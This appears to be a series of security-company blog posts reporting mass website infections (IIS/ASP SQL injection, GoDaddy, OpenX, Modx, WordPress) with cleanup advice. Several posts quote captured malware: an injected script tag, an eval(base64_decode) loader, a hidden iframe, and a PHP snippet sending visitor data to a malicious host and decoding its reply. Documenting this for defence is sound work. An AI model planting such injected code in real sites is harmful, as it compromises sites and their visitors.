Attack against IIS/ASP sites – google-stat50.info

A large number of sites have been hacked again in the last few days with a malware script pointing to google-stat50.info (and google-stats50.info) . Not only small sites, but some big ones got hit as well. It is the same SQL injection attack as used in the robint-us mass infection of a few months ago.

What do all these sites have in common? They are all hosted on IIS servers, using ASP.net and are vulnerable to SQL injection.

How many sites got infected? According to Google, at least 1,500 sites got hacked and blacklisted, but the number is a lot bigger, since not all the sites got checked by Google:

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 1577 domain(s), including asianpopcorn.com/, koreanmovie.com/, golfyou.net/.


Read More

GoDaddy hacked – Fixing the “headers already sent” error

As you saw over the last few days, various sites at GoDaddy were exploited causing lots of complaints on Twitter and in other places about GoDaddy security.

Well, today, many of those sites were reinfected (again) and GoDaddy tried to fix the them automatically. However, their scripts failed for some reason, leaving some sites with empty lines at the top of the PHP files, causing these errors to show up:

Warning: Cannot modify header information – headers already sent by (output started at..

So, if your sites are showing these errors, just run this script:

http://sucuri.net/malware/helpers/clear_php.txt

(right click – save as clear_php.txt, rename to clear.php and upload via FTP to your site. Open your browser and execute it as yoursite.com/clear.php).

That should fix these issues. If you need any help, contact us at http://sucuri.net/support

GoDaddy sites hacked – myblindstudioinfoonline.com and Hilary Kneber

We can now confirm there is an undetermined number of sites hosted at GoDaddy that have been attacked and exploited. Our research is showing this is an ongoing issue that started within the last couple hours.

All the sites we’ve seen so far contain the following javascript added to all PHP files:

<script src="http://myblindstudioinfoonline.com/ll.php"

Which are generated by a very long eval(base64_decode line:

eval(base64_decode("aWYoZnVuY3Rpb....

Here is the malware entry our scanner is detecting:



Read More

OpenX users – Time to upgrade

*Note that openx.org is currently offline, so we recommend disabling it until you can upgrade.
**We are mirroring version 2.8.7 here: http://sucuri.net/openx-2.8.7.tar.gz if you don’t want to wait until openx is back online.
***If your site is hacked/blacklisted and you need help, email us at support@sucuri.net

If you are using OpenX, make sure to upgrade it to the latest version (2.8.7) as soon as possible.

Older versions have a known vulnerability that is being exploited in the wild.

This is the announcement from the OpenX team (their site is offline, so I am copying in here):

Security is an important priority at OpenX and we’re constantly working to provide security patches and bug fixes as soon as we become aware of any potential issue. As these issues are discovered, we validate, patch and release as quickly as we can. But it’s important to understand that avoiding potential security issues also requires server administrators to be vigilant and upgrade their systems to new, patched versions as soon as they become available.

It has been brought to our attention that there is a vulnerability in the 2.8 downloadable version of OpenX that can result in a server running the downloaded version of OpenX being compromised. We have already closed this vulnerability with the latest version of our software. To avoid this issue, we recommend that all users immediately upgrade their systems to 2.8.7.

You can download the new version here: http://www.openx.org/ad-server/download (also offline, but hopefully it will be back soon).

Example of malware being used in the wild: http://sucuri.net/malware/entry/MW:IFRAME:HD36

If you can’t upgrade, make sure to delete the following file: admin/plugins/videoReport/lib/ofc2/ofc_upload_image.php

We will post more details as we learn.
Read More

Blackhat SEO Spam C&C: wseow and seotoos up to no good!

We have been tracking these Blackhat SEO Spam C&C (command and control) servers for a while and thought it would be a good time to expose some of the details.

They have been actively trying to exploit blogs using old versions of WordPress to use them as part of their spam network.

IP addresses used:
94.75.221.117
94.75.221.118

Malware being used:
On the sites we’ve analyzed so far, wp-settings.php and index.php are hacked to load the SPAM, and to serve as a backdoor to the attackers.

This is the code added to the bottom of wp-settings.php:

http://sucuri.net/?page=tools&title=blacklist&detail=fe7b3ef5bba0429150672dfea5a66109

Read More

ASIS International Website Blacklisted by Google

The official website (asisonline.org) of ASIS International, a major physical security association was hacked and blacklisted yesterday. Add another case to the list of sites using outdated and/or vulnerable applications. In the case of ASIS, they were running a vulnerable version of OpenX (ad server software) and the attackers injected malicious code in there.

Anyone visiting the ASIS website has ads served from ads.asisonline.org which is the culprit. The ad server is loading malware from: hxxp://liyerfit.com/blogs/martin/. The malware string can be detected using our scanner.



Read More

Success Magazine Blog Hit With Malware

We were analyzing some hacked sites today and one of them was full of SPAM. After some digging, we found that it was loading the Blackhat SEO Spam from blog.success.com (the official blog of Success Magazine).

We conducted a quick scan of their blog, we can see that it is being used to load all sorts of Pharma goodness:

Success spam

Read More

Modx and the new gcounter.cn attack

Quick malware update. See all the latest ones here.

We are seeing lately many sites running Modx that are infected with a malware getting loaded from the file /manager/includes/document.parser.class.inc.php.

We don’t know yet how the sites are being hacked, but the interesting thing is that all of them are being “managed” by gcounter.cn (a famous malware site).

Basically a big code is added to the bottom of that file to call gcounter.cn to get what malicious iframe to send to the end user. Gcounter then responds with the proper one to load:

< i frame src=”http://sslsite.in/x/?src=Sirius&id=zerling&o=o” style=”display:none”>


Read More

Malware update – ssl-validation.net

Quick malware update: The site ssl-validation.net (nice name) is being used to distribute SEO spam and malware (Rhe famous fake AV, say it ain’t so).

You can get details of the code being used here: http://sucuri.net/?page=tools&title=blacklist&detail=7ea73e3ac775b52b945d5b45a5abb7ad

$outsourceurl="http://ssl-validation.net/gt.php?site=”.urlencode($_SERVER['HTTP_HOST']).’&page=’.urlencode($_SERVER['REQUEST_URI']).’&ip=’.urlencode($_SERVER['REMOTE_ADDR']).’&agent=’.urlencode($_SERVER['HTTP_USER_AGENT']);
$links = base64_decode(file_get_contents($outsourceurl));

Most of the time, it is inserting an eval(base64_decode inside the template-loader.php file from WordPress.

The malicious site is hosted at 95.211.108.146.

Suggestion for hosting companies: Block this IP.

Malware update – seconeo.com,secowo.com,etc

We will be posting some quick malware updates on our blog from now on. If your WordPress site got hacked with malware from any of these domains:

http://ae.awaue.com

http://ie.eracou.com

http://ao.euuaw.com

http://aeaaea.com/ou

http://secree.com/re

http://uoauer.com/si

http://oeooea.com/ve

http://secowo.com/wo

http://ouroue.com/se

In addition to remove the malicious code from the database (wp-posts table), you also need to remove an admin user that was added as part of this attack. It can have many names: JordanK, JoshuaH, MikeM, BettyJ, etc.

The way to identify the malicious user name is that his password will be set to $P$BWrPjMxeckS8Qjhhd.3CqhhpM5c5G3/ and the creation date will be set to 0000-00-00 00:00:00.

The following SQL will fix it up:

delete from wp_users where user_pass = ‘$P$BWrPjMxeckS8Qjhhd.3CqhhpM5c5G3/’ AND user_registered = ‘0000-00-00 00:00:00′;

We will be posting more details as we get them.

If your site is hacked and you need help, visit http://sucuri.net to learn about our malware removal and monitoring plans.